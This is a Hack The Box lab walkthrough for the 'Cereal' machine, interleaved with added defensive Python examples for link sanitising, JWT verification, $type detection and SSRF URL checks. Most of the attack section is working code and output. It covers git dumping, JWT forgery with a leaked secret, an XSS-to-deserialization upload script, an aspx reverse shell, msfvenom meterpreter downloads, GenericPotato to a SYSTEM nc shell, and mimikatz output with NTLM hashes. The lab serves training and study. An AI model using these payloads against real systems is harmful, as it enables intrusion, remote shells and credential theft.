Hack-The-Box-walkthrough[Cereal]

introduction

OS: Windows
Difficulty: Hard
Points: 40
Release: 21 Nov 2020
IP: 10.10.10.217


information gathering

First, run nmap as usual:

┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.217
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 10.0
443/tcp open ssl/http Microsoft IIS httpd 10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

vhosts from https certificate (add to /etc/hosts):

1
cereal.htb source.cereal.htb

Dump and extract the exposed git directory at source.cereal.htb/.git:

git clone https://github.com/internetwache/GitTools.git
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# ip=http://source.cereal.htb/.git/
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# mkdir /tmp/git
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# mkdir /tmp/src
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# ./gitdumper.sh $ip /tmp/git
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating /tmp/git/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/34/b68232714f841a274050591ff5595dcf7f85da
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/8f/2a1a88f15b9109e1f63e4e4551727bfb38eee5
[+] Downloaded: objects/7b/d9533a2e01ec11dfa928bd491fe516477ed291
[+] Downloaded: objects/3a/23ffe921530036a4e0c355e6c8d1d4029cb728
...
┌──(root💀kali)-[~/GitTools-master/Extractor]
└─# ./extractor.sh /tmp/git /tmp/src
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: 3a23ffe921530036a4e0c355e6c8d1d4029cb728
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/.gitignore
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ApplicationOptions.cs
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/Cereal.csproj
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/CerealContext.cs
[+] Found folder: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/.gitignore
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/README.md
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/package-lock.json
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/package.json
[+] Found folder: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/public
...
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# mv /tmp/src ./src
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# ls
src
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# tree
.
└── src
├── 0-3a23ffe921530036a4e0c355e6c8d1d4029cb728
│   ├── ApplicationOptions.cs
│   ├── appsettings.Development.json
│   ├── appsettings.json
│   ├── CerealContext.cs
│   ├── Cereal.csproj
│   ├── ClientApp
│   │   ├── package.json
│   │   ├── package-lock.json
│   │   ├── public
│   │   │   ├── favicon.ico
│   │   │   ├── FuturaStd-Bold.woff
...

exposed secret in the file “2-8f2a1a88f15b9109e1f63e4e4551727bfb38eee5/Services/UserService.cs”:

secretlhfIH&FY*#oysuflkhskjfhefesf

vulnerability in the file “Controllers\RequestsController.cs”:
insecure deserialization (ysoserial gadgets can’t be used because of custom protection, but deserializing the application’s own DownloadManager object can be used to upload an aspx shell)

vulnerability in the file “ClientApp\src\AdminPage\AdminPage.jsx”:

XSS in react-marked-markdown (https://snyk.io/vuln/npm:react-marked-markdown:20180517)
-> with this XSS we can issue server-side requests and trigger the deserialization
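The react-marked-markdown issue is a link-target problem: the renderer turns `[text](javascript:…)` into a clickable href, so whatever markdown lands in a request title runs in the admin's browser. As an added example, not code from the original post or from the Cereal application, the Python below shows the check a renderer (or the API validating the `title` field) should apply before accepting a markdown link: percent-decode, strip the control characters browsers ignore, and allow only an explicit scheme list. `safe_href`, `sanitize_markdown_links` and `SAMPLE_TITLE` are names and values constructed for this example; the sample title has the page's shape but a harmless base64 body.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Schemes a markdown link in a cereal "title" may legitimately point at.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# Browsers drop ASCII control characters and whitespace while parsing a URL,
# so "java\tscript:" is still javascript:; strip them before deciding.
_IGNORED_BY_BROWSERS = re.compile(r"[\x00-\x20\x7f]")

# Inline markdown link: [text](url). The url group stops at the first ")",
# which is why the payload on this page percent-encodes its own ")" as %29.
_MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")

# Constructed title in the shape of the page's payload, with a harmless
# base64 body ("hello") in place of the real script.
SAMPLE_TITLE = "[XSS](javascript: eval(atob(%22aGVsbG8=%22%29%29)"


def safe_href(raw: str) -> Optional[str]:
    """Return raw unchanged if it is a relative URL or uses an allowed scheme,
    otherwise None. The decision is made on a normalised copy (percent-decoded,
    control characters removed) so encoding tricks cannot hide the scheme."""
    candidate = _IGNORED_BY_BROWSERS.sub("", unquote(raw))
    # Only the part before the first "/", "?" or "#" can carry a scheme.
    head = re.split(r"[/?#]", candidate, maxsplit=1)[0]
    if ":" not in head:
        return raw                      # relative link, nothing to abuse
    scheme = head.split(":", 1)[0].lower()
    return raw if scheme in ALLOWED_SCHEMES else None


def sanitize_markdown_links(markdown: str) -> str:
    """Replace every [text](url) whose url fails safe_href with just its text,
    so the renderer never emits the dangerous href."""
    def keep_or_strip(match):
        text, url = match.group(1), match.group(2)
        return match.group(0) if safe_href(url) is not None else text
    return _MD_LINK.sub(keep_or_strip, markdown)


if __name__ == "__main__":
    print(sanitize_markdown_links(SAMPLE_TITLE))
```

The decision is made on the normalised copy but the original string is returned, so legitimate links are not rewritten; anything that is not relative and not on the allow-list (javascript:, data:, vbscript:, and scheme-looking junk) is reduced to its link text.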

Create a JWT with the exposed secret:

git clone https://github.com/ticarpi/jwt_tool
┌──(root💀kali)-[~/jwt_tool-master]
└─# python3 jwt_tool.py -S hs256 -p 'secretlhfIH&FY*#oysuflkhskjfhefesf' $(echo -n '{"alg":"HS256","typ":"JWT"}' | base64).$(echo -n '{"name": "1", "exp":' `date -d "+7 days" +%s`} | base64 -w0).

jwt_tool Version 2.1.0 @ticarpi

Original JWT:

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "HS256"
[+] typ = "JWT"

Token payload values:
[+] name = "1"
[+] exp = 1611309858 ==> TIMESTAMP = 2021-01-22 05:04:18 (UTC)

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

jwttool_8f513bf6c46dcbab36a08eb47d9dd4c0 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMTMwOTg1OH0.JmUBfIp6MwKWxKDXAPhFEvqHa60qqlYOBWnrKSedMcE
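The token above is accepted only because the HS256 signing secret shipped with the source; anyone holding it can mint tokens for any user. As an added example (not from the original post or the Cereal application), the Python below re-implements HS256 signing and verification with the standard library, checks that the page's token verifies under the leaked secret, and shows that rotating the secret invalidates every token minted with the old one. `LEAKED_SECRET` and `PAGE_TOKEN` are copied from the walkthrough; `ROTATED_SECRET` is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Values from the walkthrough: the secret found in UserService.cs and the
# token jwt_tool produced with it.
LEAKED_SECRET = "secretlhfIH&FY*#oysuflkhskjfhefesf"
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJuYW1lIjoiMSIsImV4cCI6MTYxMTMwOTg1OH0."
              "JmUBfIp6MwKWxKDXAPhFEvqHa60qqlYOBWnrKSedMcE")
# Constructed placeholder for the secret an operator would rotate to.
ROTATED_SECRET = "example-rotated-secret-not-from-the-page"


def _b64url(data: bytes) -> str:
    """Base64url without padding, as RFC 7515 requires for JWS segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def hs256_sign(claims: dict, secret: str) -> str:
    """Compact JWS: header.payload.HMAC-SHA256(secret, header.payload)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"},
                                separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def hs256_verify(token: str, secret: str, now: Optional[int] = None) -> Optional[dict]:
    """Return the claims if the token is validly signed and unexpired, else None.

    The algorithm is pinned to HS256, so an "alg":"none" header or a key
    confusion attempt is rejected before any MAC is computed.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        given_sig = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given_sig):   # constant-time compare
        return None
    now = int(time.time()) if now is None else now
    exp = claims.get("exp") if isinstance(claims, dict) else None
    if exp is not None and now >= exp:
        return None
    return claims


def exposure_report(token: str, secret: str, rotated: str, now: int) -> dict:
    """What a leaked secret means for one token: it verifies, it can be
    re-minted byte for byte, and rotation is what makes it stop working."""
    claims = hs256_verify(token, secret, now)
    return {
        "verifies_with_leaked_secret": claims is not None,
        "forgeable": claims is not None and hs256_sign(claims, secret) == token,
        "verifies_after_rotation": hs256_verify(token, rotated, now) is not None,
    }


if __name__ == "__main__":
    # now is fixed before the token's exp so the page's token is not yet expired
    print(json.dumps(exposure_report(PAGE_TOKEN, LEAKED_SECRET, ROTATED_SECRET,
                                     now=1611000000), indent=2))
```

The remediation side is the last key: once the secret is rotated (and kept out of the repository), every token signed with the leaked value fails verification, which is the only way to revoke tokens in a stateless HS256 setup.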

How to create the serialized object in C#:

using System;
using Newtonsoft.Json;

// Cereal.DownloadHelper is the class from the leaked source tree; with
// TypeNameHandling.All the JSON carries a "$type" discriminator naming it.
class Program
{
    static void Main()
    {
        Cereal.DownloadHelper dh = new Cereal.DownloadHelper
        {
            URL = "https://someurl/pic.png",
            FilePath = "pic.png",
        };

        string json = JsonConvert.SerializeObject(dh, new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.All
        });
        Console.WriteLine(json);
    }
}

The crafted payload looks like this:

{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://<ip>/shell.aspx","FilePath":"c:/inetpub/source/uploads/shell.aspx"}
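The `$type` key in that payload is what Newtonsoft.Json honours whenever `TypeNameHandling` is set to anything but `None`; the fix is to deserialize untrusted input with `TypeNameHandling.None`, or with a strict `SerializationBinder` that admits only the application's own DTOs. Until that fix ships, a `$type` key in client-supplied JSON is a reliable detection signal. The Python below is an added example, not code from the original post or the Cereal application: it audits captured request bodies for `$type` keys, including bodies where the serialized object is nested inside a JSON string the way the `/requests` endpoint's `json` field carries it. `SAMPLE_BODIES` are constructed for the example.

```python
import json
from typing import Any, Dict, FrozenSet, Iterator, List

MAX_DEPTH = 8  # bound recursion on deliberately deep documents

# Constructed sample request bodies: what the SPA normally sends to /requests,
# the page's deserialization payload wrapped the same way, and a non-JSON body.
SAMPLE_BODIES = [
    json.dumps({"json": json.dumps({"title": "Corn flakes", "flavor": "plain",
                                    "color": "#FFF", "description": "ok"})}),
    json.dumps({"json": json.dumps({"$type": "Cereal.DownloadHelper, Cereal",
                                    "URL": "http://<ip>/shell.aspx",
                                    "FilePath": "c:/inetpub/source/uploads/shell.aspx"})}),
    "title=Corn+flakes&flavor=plain",
]


def iter_type_names(node: Any, depth: int = 0) -> Iterator[str]:
    """Yield every "$type" value reachable from node, descending into lists,
    objects, and strings that themselves parse as JSON (double encoding)."""
    if depth > MAX_DEPTH:
        return
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "$type" and isinstance(value, str):
                yield value
            yield from iter_type_names(value, depth + 1)
    elif isinstance(node, list):
        for value in node:
            yield from iter_type_names(value, depth + 1)
    elif isinstance(node, str):
        stripped = node.lstrip()
        if stripped.startswith(("{", "[")):
            try:
                inner = json.loads(stripped)
            except ValueError:          # not JSON after all; nothing to descend into
                return
            yield from iter_type_names(inner, depth + 1)


def audit_body(body: str, allowed: FrozenSet[str] = frozenset()) -> List[str]:
    """Return the $type names in one request body that are not on the allow-list.
    The default allow-list is empty: client input should never carry a type
    discriminator, so any hit is worth an alert."""
    return [t for t in iter_type_names(body) if t not in allowed]


def audit_bodies(bodies, allowed: FrozenSet[str] = frozenset()) -> Dict[int, List[str]]:
    """Map body index -> offending type names, for bodies that have any."""
    findings: Dict[int, List[str]] = {}
    for i, body in enumerate(bodies):
        hits = audit_body(body, allowed)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    print(audit_bodies(SAMPLE_BODIES))   # {1: ['Cereal.DownloadHelper, Cereal']}
```

Run over a web-server log that retains request bodies, or as a WAF rule, this catches the discriminator regardless of how many layers of JSON-in-a-string wrap it; the depth bound keeps a crafted deeply nested body from exhausting the auditor.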

Serve the aspx reverse shell (edit the host and port in shell.aspx; I use port 9001):

wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
mousepad shell.aspx
python -m SimpleHTTPServer 80

script to upload shell.aspx (change my_ip and jwt_token):

upload.py:
import requests
from urllib3.exceptions import InsecureRequestWarning
import base64

# the target uses a self-signed certificate, so silence the verify=False warning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


jwt_token = '<token>'   # token created with jwt_tool above
my_ip = '<ip>'          # host serving shell.aspx

URL = 'https://cereal.htb/requests'


# JavaScript that runs in the admin's browser: it posts the serialized
# DownloadHelper to /requests and then fetches the new request back by id,
# which triggers the deserialization and the download of shell.aspx.
js_payload = """var jwt_token = '"""+jwt_token+ """';
targeturl = 'https://cereal.htb/requests';

req = new XMLHttpRequest;
var payload = JSON.stringify({"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://""" +my_ip+"""/shell.aspx","FilePath":"C:/inetpub/source/uploads/shell.aspx"}'});

req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var id = JSON.parse(this.responseText).id;
        //console.log(id)

        req2 = new XMLHttpRequest;
        req2.open('GET', targeturl + "/" + id, false);
        req2.setRequestHeader("Authorization", "Bearer " + jwt_token);
        req2.send();
    }
}
req.open('POST', targeturl, false);
req.setRequestHeader("Authorization", "Bearer " + jwt_token);
req.setRequestHeader('Content-type', 'application/json');
req.send(payload);"""


# the script goes into a markdown link in the request title; ")" is encoded as
# %29 so it does not terminate the markdown link early
js_payload_b64 = base64.b64encode(js_payload.encode('utf-8'))
payload = {'json': '{"title":"[XSS](javascript: eval(atob(%22' + js_payload_b64.decode('utf-8') + '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}'}
headers = {'Authorization': 'Bearer ' + jwt_token}


print("sending payload: " + str(payload))
r = requests.post(URL, headers=headers, json=payload, verify=False)
print(r.text)

Wait a bit until the file is uploaded (one minute at most),
then start an nc listener on the aspx shell port:

nc -lvp 9001

Trigger the reverse shell:

curl -k https://source.cereal.htb/uploads/shell.aspx

enumerate listening ports:

┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.217.
Ncat: Connection from 10.10.10.217:49973.
Spawn Shell...
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
cereal\sonny
c:\windows\system32\inetsrv>netstat -aon | findstr /i "listening"
netstat -aon | findstr /i "listening"
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 1668
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8172 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 468
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 308
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1076
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 600
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 620
TCP 10.10.10.217:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:49668 0.0.0.0:0 LISTENING 3404
TCP 127.0.0.1:49672 0.0.0.0:0 LISTENING 3704
TCP [::]:22 [::]:0 LISTENING 1668
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 852
TCP [::]:443 [::]:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 4
TCP [::]:8172 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 468
TCP [::]:49665 [::]:0 LISTENING 308
TCP [::]:49666 [::]:0 LISTENING 1076
TCP [::]:49667 [::]:0 LISTENING 600
TCP [::]:49670 [::]:0 LISTENING 620
TCP [::1]:49668 [::]:0 LISTENING 3404

-> port 8080 is interesting: it is listening locally but was not among the ports nmap found open from outside

Get the user flag:

c:\Users\sonny\Desktop>type user.txt
type user.txt
0ed97bdf062900a2eb5b18deb96bfa98

Enumerate privileges:

c:\Users\sonny\Desktop>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
============ ==============================================
cereal\sonny S-1-5-21-1433318354-2681105707-1558593885-1000


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
==================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\source.cereal.htb Well-known group S-1-5-82-1091461672-2110406625-1707532520-1965434010-2231625233 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

-> SeImpersonatePrivilege enabled

Create a meterpreter exe with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -b "\x00\x0a" -a x86 --platform windows -f exe -o m.exe

Start the handler in metasploit:

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.6
set LPORT 9003
run

Download m.exe to the target and execute it:

mkdir C:\temp
cd C:\temp
curl http://10.10.14.6/m.exe -o C:\temp\m.exe
.\m.exe

Create a port forward in meterpreter:

# portfwd single ports
portfwd add -l 8081 -p 8080 -r 127.0.0.1

Analyze the local port 8080 (forwarded to port 8081 on our host): it serves GraphQL.
After enumerating the GraphQL schema, you find a callable mutation, updatePlant, whose sourceURL parameter allows SSRF.
Combine this SSRF with SeImpersonatePrivilege -> juicy potato over HTTP -> https://github.com/micahvandeusen/GenericPotato
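The `sourceURL` parameter is the SSRF sink: the service fetches whatever URL it is handed, with its own identity, so a loopback URL reaches listeners that are only bound locally, such as the one GenericPotato opens. As an added example that is not part of the original post or the Cereal code, the Python below is the validation such a fetch should perform before connecting: http/https only, default ports only, and every address the host resolves to must be public. The resolver is injectable so the checks run offline; `check_source_url`, `FAKE_DNS` and `fake_resolver` are names and values constructed for this example.

```python
import ipaddress
import socket
from typing import Callable, Set, Tuple
from urllib.parse import urlsplit

Resolver = Callable[[str], Set[str]]

# Constructed name table so the example runs without network access.
FAKE_DNS = {
    "cdn.example": {"93.184.216.34"},
    "localhost": {"127.0.0.1", "::1"},
    "rebinder.example": {"93.184.216.34", "127.0.0.1"},   # split answer
}


def fake_resolver(host: str) -> Set[str]:
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"constructed resolver: {host} unknown")


def resolve_all(host: str) -> Set[str]:
    """Every address the host currently resolves to (A and AAAA records)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_source_url(url: str, resolve: Resolver = resolve_all) -> Tuple[bool, str]:
    """Decide whether a server-side fetch of url is acceptable.

    Returns (ok, reason). Rejects non-http(s) schemes, non-default ports,
    hosts that do not resolve, and any host with even one resolved address
    that is loopback, private, link-local or otherwise non-public.
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname
        port = parts.port            # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    if port not in (None, 80, 443):
        return False, f"port {port} not allowed"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IP: nothing to resolve
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError:
            return False, f"{host} does not resolve"
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])   # drop an IPv6 zone id
        if not ip.is_global:
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://localhost:8889", "https://cdn.example/plant.png"):
        print(candidate, "->", check_source_url(candidate, fake_resolver))
```

Two caveats belong with this check. Resolving here and connecting later is still exposed to DNS rebinding, so the fetch should connect to the address that was validated rather than resolving again; and redirects must be disabled or re-validated per hop, otherwise a public URL can bounce the request to a loopback one.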

Execute GenericPotato.exe on the target:

curl http://10.10.14.6/nc64.exe -o C:\temp\nc64.exe
curl http://10.10.14.6/GenericPotato.exe -o C:\temp\GenericPotato.exe
curl http://10.10.14.6/NtApiDotNet.xml -o C:\temp\NtApiDotNet.xml
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 9005 -e powershell" -e HTTP -l 8889

Call the mutation with curl on kali:

curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'

We get a SYSTEM reverse shell and the root flag:

┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nc -lvp 9005
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.217.
Ncat: Connection from 10.10.10.217:50126.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd \users\administrator\desktop
cd \users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir


Directory: C:\users\administrator\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/15/2021 12:17 AM 34 root.txt


PS C:\users\administrator\desktop> cat root.txt
cat root.txt
2ef4dd4807656f580a6e513cb43957e0

Use mimikatz to get the NTLM hash:

PS C:\users\administrator\desktop> .\mimikatz.exe
.\mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 546250 (00000000:000855ca)
Session : Batch from 0
User Name : sonny
Domain : CEREAL
Logon Server : CEREAL
Logon Time : 1/15/2021 12:44:49 AM
SID : S-1-5-21-1433318354-2681105707-1558593885-1000
msv :
[00000003] Primary
* Username : sonny
* Domain : CEREAL
* NTLM : 9806947d86b058dfca0dde0433579cab
* SHA1 : 519524c36daac6f62dbb631fac66ed1cedf3ab01
tspkg :
wdigest :
* Username : sonny
* Domain : CEREAL
* Password : (null)
kerberos :
* Username : sonny
* Domain : CEREAL
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : CEREAL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : CEREAL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : cereal$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 44904 (00000000:0000af68)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 196095 (00000000:0002fdff)
Session : Service from 0
User Name : cereal.htb
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 1/15/2021 12:17:44 AM
SID : S-1-5-82-3871417701-2112554078-3336495516-2512288484-1474308953
msv :
tspkg :
wdigest :
* Username : CEREAL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 1/15/2021 12:17:29 AM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 89034 (00000000:00015bca)
Session : Batch from 0
User Name : sonny
Domain : CEREAL
Logon Server : CEREAL
Logon Time : 1/15/2021 12:17:29 AM
SID : S-1-5-21-1433318354-2681105707-1558593885-1000
msv :
[00000003] Primary
* Username : sonny
* Domain : CEREAL
* NTLM : 9806947d86b058dfca0dde0433579cab
* SHA1 : 519524c36daac6f62dbb631fac66ed1cedf3ab01
tspkg :
wdigest :
* Username : sonny
* Domain : CEREAL
* Password : (null)
kerberos :
* Username : sonny
* Domain : CEREAL
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 46077 (00000000:0000b3fd)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :
* Username : CEREAL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 46049 (00000000:0000b3e1)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :
* Username : CEREAL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :

